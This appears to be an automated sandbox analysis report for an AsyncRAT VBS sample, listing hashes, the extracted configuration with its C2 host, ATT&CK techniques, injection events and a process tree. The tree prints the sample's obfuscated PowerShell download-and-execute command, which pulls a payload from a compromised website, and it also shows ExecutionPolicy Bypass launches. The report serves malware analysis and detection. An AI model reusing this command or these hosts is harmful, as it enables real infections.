asyncrat | 2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-10-2024 01:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd.vbs
Size

12KB
MD5

75f80ac848e2c5c71c5fc4960da7a430
SHA1

abcd9316f8a1251220db81d4d075ae659a0fb790
SHA256

2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd
SHA512

af4db86a398ac31f3b7d909ed62c8ea6b3672db933deadf32ae74e3dac581816372bfb0fc113f5b1aab462291d560516cadd52c655eebd79b7f639467c2c0ce1
SSDEEP

48:UvvvvvvvvvvviddddddddddFP5+31HtwLhLtz/zzUSAzzzzzzzzzzzzzzzzzzzze:UvvvvvvvvvvviddddddddddZagKoJ

Score

10^/10

asyncrat kk_______discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

kk_______

helpher.linkpc.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1036 powershell.exe

flow	pid	process
7	1036	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

5064 powershell.exe
4204 powershell.exe
1036 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4204 set thread context of 4288 4204 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

aspnet_compiler.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1036 powershell.exe
1036 powershell.exe
5064 powershell.exe
5064 powershell.exe
4204 powershell.exe
4204 powershell.exe

pid	process
5064	powershell.exe
4204	powershell.exe
1036	powershell.exe

description	pid	process	target process
PID 4204 set thread context of 4288	4204	powershell.exe	aspnet_compiler.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe

pid	process
1036	powershell.exe
1036	powershell.exe
5064	powershell.exe
5064	powershell.exe
4204	powershell.exe
4204	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	5064	powershell.exe
Token: SeSecurityPrivilege	5064	powershell.exe
Token: SeTakeOwnershipPrivilege	5064	powershell.exe
Token: SeLoadDriverPrivilege	5064	powershell.exe
Token: SeSystemProfilePrivilege	5064	powershell.exe
Token: SeSystemtimePrivilege	5064	powershell.exe
Token: SeProfSingleProcessPrivilege	5064	powershell.exe
Token: SeIncBasePriorityPrivilege	5064	powershell.exe
Token: SeCreatePagefilePrivilege	5064	powershell.exe
Token: SeBackupPrivilege	5064	powershell.exe
Token: SeRestorePrivilege	5064	powershell.exe
Token: SeShutdownPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeSystemEnvironmentPrivilege	5064	powershell.exe
Token: SeRemoteShutdownPrivilege	5064	powershell.exe
Token: SeUndockPrivilege	5064	powershell.exe
Token: SeManageVolumePrivilege	5064	powershell.exe
Token: 33	5064	powershell.exe
Token: 34	5064	powershell.exe
Token: 35	5064	powershell.exe
Token: 36	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	5064	powershell.exe
Token: SeSecurityPrivilege	5064	powershell.exe
Token: SeTakeOwnershipPrivilege	5064	powershell.exe
Token: SeLoadDriverPrivilege	5064	powershell.exe
Token: SeSystemProfilePrivilege	5064	powershell.exe
Token: SeSystemtimePrivilege	5064	powershell.exe
Token: SeProfSingleProcessPrivilege	5064	powershell.exe
Token: SeIncBasePriorityPrivilege	5064	powershell.exe
Token: SeCreatePagefilePrivilege	5064	powershell.exe
Token: SeBackupPrivilege	5064	powershell.exe
Token: SeRestorePrivilege	5064	powershell.exe
Token: SeShutdownPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeSystemEnvironmentPrivilege	5064	powershell.exe
Token: SeRemoteShutdownPrivilege	5064	powershell.exe
Token: SeUndockPrivilege	5064	powershell.exe
Token: SeManageVolumePrivilege	5064	powershell.exe
Token: 33	5064	powershell.exe
Token: 34	5064	powershell.exe
Token: 35	5064	powershell.exe
Token: 36	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	5064	powershell.exe
Token: SeSecurityPrivilege	5064	powershell.exe
Token: SeTakeOwnershipPrivilege	5064	powershell.exe
Token: SeLoadDriverPrivilege	5064	powershell.exe
Token: SeSystemProfilePrivilege	5064	powershell.exe
Token: SeSystemtimePrivilege	5064	powershell.exe
Token: SeProfSingleProcessPrivilege	5064	powershell.exe
Token: SeIncBasePriorityPrivilege	5064	powershell.exe
Token: SeCreatePagefilePrivilege	5064	powershell.exe
Token: SeBackupPrivilege	5064	powershell.exe
Token: SeRestorePrivilege	5064	powershell.exe
Token: SeShutdownPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeSystemEnvironmentPrivilege	5064	powershell.exe
Token: SeRemoteShutdownPrivilege	5064	powershell.exe
Token: SeUndockPrivilege	5064	powershell.exe
Token: SeManageVolumePrivilege	5064	powershell.exe
Token: 33	5064	powershell.exe
Token: 34	5064	powershell.exe
Token: 35	5064	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exeWScript.execmd.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2740 wrote to memory of 1036	2740	WScript.exe	powershell.exe
PID 2740 wrote to memory of 1036	2740	WScript.exe	powershell.exe
PID 1036 wrote to memory of 400	1036	powershell.exe	WScript.exe
PID 1036 wrote to memory of 400	1036	powershell.exe	WScript.exe
PID 400 wrote to memory of 4516	400	WScript.exe	cmd.exe
PID 400 wrote to memory of 4516	400	WScript.exe	cmd.exe
PID 4516 wrote to memory of 5064	4516	cmd.exe	powershell.exe
PID 4516 wrote to memory of 5064	4516	cmd.exe	powershell.exe
PID 3928 wrote to memory of 4580	3928	WScript.exe	cmd.exe
PID 3928 wrote to memory of 4580	3928	WScript.exe	cmd.exe
PID 4580 wrote to memory of 4204	4580	cmd.exe	powershell.exe
PID 4580 wrote to memory of 4204	4580	cmd.exe	powershell.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe
PID 4204 wrote to memory of 4288	4204	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4(''https://totalhorsehealth.com/wp-admin/images/images/img.jpg'')'.Replace('t4','adString');IEX($t1+$t2+$t3)
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4204

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:4288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Unlimited\ISO\Binnot.bat

Filesize
96B

MD5
f1d747a7825a5db756d428a5254d244e

SHA1
7db56fe57492bd856c787cd2a836eff4f2ce5e01

SHA256
5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf

SHA512
4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.ps1

Filesize
781B

MD5
58ef18971b1520648e0c6d67036251ff

SHA1
68bd1ee657ff233f6a1ee453914aaecdeb845284

SHA256
226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3

SHA512
9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.vbs

Filesize
161B

MD5
7b0e58ca3cd90265cfad552b57b52726

SHA1
732d67419df7ae6ab6512e697f7cdfd72aad4f15

SHA256
f6f353790e3f1f92ac7be5bc0f03a334e199cbbd53392e9eb8079f9b8495cc6f

SHA512
9f4853237c88f2045bdacc616360f67abadfec21547a3413f0e72491e0c9d896030a3091e3bf5453f0b787c6dfcaea51c4eaa3e15a1ab982b7e3d5159172c0ba

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.bat

Filesize
99B

MD5
eff64d56c40c54a1f9891d7a6ad54899

SHA1
dbaf9a4aeb8484690d6118155d59158598f0799a

SHA256
c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2

SHA512
c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.ps1

Filesize
251KB

MD5
7e35bcb43f83d90da193a20f4022961d

SHA1
9a87c04bed313ec676b1a95a40388b039e4b7df4

SHA256
f11b826123593fc55cdb377b7f88c5f97ed6d6a031e03f5ca367d462642b516b

SHA512
762a256e07c65bc8db3714e5a170081edd006e7f2c53a3474cb13a56e74925073a1cf974930b824e74773c2a4e21d952f90dab7d7238ef607a823fdb8c1cf607

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.vbs

Filesize
165B

MD5
b1b2e3fb678ad030e95ff623fe80d979

SHA1
cf00dc8fb35e255fee951b6baf08fd44e1e5b5fc

SHA256
19a88a8c19ad3f6dde00c79954d9822f1197bb0c73a4c166470fd44de4c89f33

SHA512
15d4670d547cf6556198fffd4c2ce7a614c948d7aa1361ad80187fe5abf163c9ef61e0c5693d145dce3194bbfae5f0734b3827feee7c0418c19e88f2d87aae62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
def7884bfec63bbb926d51438b7439c2

SHA1
48f7438447cc4b0e6e44735dc17a2659380218fd

SHA256
d4951ddfe54394c89d24be1f17576dceefdcc97b905f33fae7bf1caeba2d92f9

SHA512
22c529d29befd1b070cb5cdb9c1194ba162035756f7b9d25d4c73537dd286c483fd4a4770b920d58a9536cfc64a5e9bff88f5f46bf1d2cc5bf5ab25005aacfb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d67a8fd291fb19bdb156f59efb9f2cc7

SHA1
a51844a5d207f22fb54a060d7cd8b1b4e4c142c5

SHA256
10c4a1615ea2ecb7b86a0362229d02e4d60530bea53ba2b625b51505e0af3655

SHA512
ba0bb1f548f83d846ed445acf7e00a06b30a28ab8edff4c2c657e2023a69739cbc2b24bdd20f9f49764850be01b7d7e872cb5f6864bf4f7e0ed9466b3d8d25fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3zhpgqx.zqi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1036-1-0x00000223385F0000-0x0000022338612000-memory.dmp

Filesize
136KB

Download
memory/1036-11-0x00007FFEE6C30000-0x00007FFEE76F1000-memory.dmp

Filesize
10.8MB

Download
memory/1036-24-0x00007FFEE6C30000-0x00007FFEE76F1000-memory.dmp

Filesize
10.8MB

Download
memory/1036-0-0x00007FFEE6C33000-0x00007FFEE6C35000-memory.dmp

Filesize
8KB

Download
memory/1036-12-0x00007FFEE6C30000-0x00007FFEE76F1000-memory.dmp

Filesize
10.8MB

Download
memory/4204-52-0x0000020A9FD50000-0x0000020A9FD68000-memory.dmp

Filesize
96KB

Download
memory/4288-53-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4288-55-0x0000000005620000-0x00000000056BC000-memory.dmp

Filesize
624KB

Download
memory/4288-56-0x0000000005C70000-0x0000000006214000-memory.dmp

Filesize
5.6MB

Download
memory/4288-57-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download